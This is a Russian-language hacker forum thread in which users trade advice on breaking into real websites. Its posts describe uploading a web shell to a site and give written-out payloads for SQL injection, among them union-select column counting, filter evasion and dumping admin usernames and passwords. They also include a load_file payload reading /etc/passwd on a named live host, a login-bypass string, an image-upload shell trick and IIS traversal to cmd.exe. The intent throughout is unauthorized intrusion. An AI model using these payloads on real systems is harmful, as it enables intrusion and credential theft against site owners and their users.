Люди, помогите с таким делом. Залил шелл на сайт, на нём несколько сайтов. у каждого сайта есть файл passwd,v, файл не пустой(до 1кб), но когда я пытаюсь его открыть мне пишет - File does not exists (/home/wmasta9/etc/сайт/passwd%2Cv)!
пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or) POST /index.php?page=uvod HTTP/1.0 username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok и POST /index.php?page=uvod HTTP/1.0 username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok и посмотри разные ли ответы сервера
лана проехали. но дайте понять смысл. если параметры не верны страница должна отобразится с ошибкой, если верны то без. это означает что скуль есть. так? дальнейшие действия?
4y4o дальше нужно подобрать количество полей например ввв.сайт.ру/скрипт.пхп?переменная=1+union+select+1,2,3,4,5,6/* можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод) можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by например ввв.сайт.ру/скрипт.пхп?переменная=1+order+by+3/* если ошибки нет то полей больше трёх или три берём например больше ввв.сайт.ру/скрипт.пхп?переменная=1+order+by+10/* если ошибка есть то полей меньше 10 и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку скажем нашли количество полей например оно равно 6 дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула ввв.сайт.ру/скрипт.пхп?переменная=1+union+select+1,2,3,4,5,version(),7,8/* если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так ввв.сайт.ру/скрипт.пхп?переменная=1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/* отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно) узнали например имя этой таблицы polzovateli и выводим логин и пароль первого пользователя(он в большинстве случаев админ) ввв.сайт.ру/скрипт.пхп?переменная=1+union+select+1,2,3,5,concat(username,0x3a,password)+from+polzovateli+limit+1,1/*
Вот запрос, судя по всему 3 таблицы : http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/* дальше http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/* You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1 Копаем дальше... непонятно пока ничего хех, версия мускла вроде как 3тья!!!! что можно еще накопать ?
Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай Code: http://city.ab.ru/index.php?pg=show&kat=12%20and%20ascii(substring(load_file(0x2F6574632F706173737764),1,1))=35 больше ничего полезного имхо, т.к. кавычки экранируются
залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? (((( при переходе на изображение просто пустое окно огромного размера
эхх нитак и нитак не получилось ((( после заливки там меняется название файла и поулчается то же самое blablabal.gif, %00 тоже не помогло ( Всеравно спасибо
бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет? только посимвольный перебор
Если в авторизации - попробуй что-нить из серии ' and 1=1/* '-- и т.п., т.е. закрываешь аргумент, дописываешь всегда верное условие или просто комментируешь остальной код. Ну это чтоб обойти авторизацию)
есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini. Гдето прочитал что таким способом можна заюзать cmd. Обьясните плз. For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be: http://server.com/scripts/..%5c../Windows/System32/ cmd.exe?/c+dir+c:\ The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command "dir c:\" in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character "\". пробовал как написано не работает
Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло
4y4o, для начала надо убедица, что на удаленном серве стоит винда, а не никсы например. А потом подбирать путь до cmd. m0use, попробуй inurl:tvoysite.com и смотри чего там проиндексировано. И ещё на archive.org посмотри старые версии сайта, мож там будут ссылки.
зайди вот сюда http://madnet.name/tools/madss/ введи свой сайт и получиш список сайтов этого же сервака Ну а там все понятно и тем более -откуда ты уверен что сам форум под эту базу еще жив может база от старого или еще че нить
